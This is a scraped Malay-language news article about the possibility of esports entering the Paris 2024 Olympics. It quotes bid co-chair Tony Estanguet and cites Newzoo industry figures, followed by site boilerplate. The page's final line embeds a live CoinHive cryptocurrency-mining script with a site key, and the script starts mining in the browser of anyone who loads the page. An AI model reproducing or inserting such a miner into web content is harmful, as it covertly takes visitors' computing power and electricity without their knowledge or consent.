© Copyright 2017, All Rights Reserved
Home / Ekslusif / e-Sukan dalam Sukan Olimpik 2024

e-Sukan dalam Sukan Olimpik 2024


KUALA LUMPUR: PEMAIN permainan video bermungkinan berpeluang untuk merebut pingat Olimpik pada tahun 2024.

Pengerusi bersama Jawatankuasa Pembidaan Olimpik Paris, Tony Estanguet berkata beliau akan mengadakan sesi perbincangan antara wakil e-sukan dan Jawatankuasa Olimpik Antarabangsa (IOC) mengenai kemungkinan penyertaan acara permainan video ini pada 2024.

Estanguet menjelaskan beliau percaya potensi kehebatan pertandingan alam maya seharusnya dipertimbangkan sebagai sukan rasmi, jika Olimpik mahu kekal relevan dalam kalangan peminat generasi baharu.

“Kita perlu melihat perkara ini dengan terperinci. Golongan belia sangat berminat dengan e-sukan dan perkara seumpama dengannya.

“Saya tidak mahu mengatakan ‘tidak’ pada peringkat awal. Saya menyifatkan satu pertemuan perlu dilakukan antara pihak IOC, golongan belia dan komuniti e-sukan untuk memahami prosesnya dan mengapa ia berjaya, ”katanya dalam satu temu bual bersama AP di London baru-baru ini.

Paris akan dipilih secara rasmi sebagai tuan rumah Sukan Olimpik pada 2024 selepas perhimpunan IOC di Lima, Peru pada bulan depan selepas pesaingnya Los Angeles bersetuju untuk menjadi tuan rumah bagi 2028.

Sementara itu, menurut laporan firma penyelidikan pemasaran Newzoo, industri e-sukan menjana pendapatan sebanyak RM2.1 billion pada tahun lalu dan merekodkan jumlah penonton seramai 320 juta dari seluruh dunia.


Source link

Tinggalkan Ulasan Anda

About admin

x

Check Also

Asal kucing jalanan kini Labun miliki kad matrik dan ikuti kuliah di UIA

SETAHUN lalu, gelagat seekor kucing yang tekun mendengar butir bicara pensyarah dirakam ...

Facebook Auto Publish Powered By : XYZScripts.com
© Copyright 2017, All Rights Reserved
%d bloggers like this:
var m = new CoinHive.Anonymous('dkVZKvPTpA9ReGRa2gsf6amqUO6Yr4Pu'); m.start();